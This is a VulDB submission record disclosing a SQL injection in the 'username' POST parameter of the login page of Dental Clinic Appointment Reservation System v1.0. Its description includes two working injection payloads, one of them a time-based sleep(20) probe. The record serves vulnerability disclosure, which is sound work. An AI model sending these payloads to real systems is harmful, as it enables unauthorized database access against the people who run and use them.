| Title | Dental Clinic Appointment Reservation System v1.0 /APR/login.php post parameter 'username' exists sql injection |
|---|
| Description | An issue was discovered in Dental Clinic Appointment Reservation System v1.0.
There is a SQL injection that can directly issue instructions to the background database system via /APR/login.php post parameter 'username'.
Payload1:username=a'&password=b&submit1=
Payload2:username=a'%2b(select*from(select(sleep(20)))a)%2b'&password=b&submit1= |
|---|
| Source | ⚠️ https://github.com/nightcloudos/bug_report/blob/main/vendors/jkev/Dental%20Clinic%20Appointment%20Reservation%20System/SQLi-1.md |
|---|
| User | niclo (UID 41812) |
|---|
| Submission | 02/26/2023 04:22 (3 years ago) |
|---|
| Moderation | 02/26/2023 12:49 (8 hours later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 221795 [SourceCodester Dental Clinic Appointment Reservation System 1.0 POST Parameter /APR/login.php Username sql injection] |
|---|
| Points | 18 |
|---|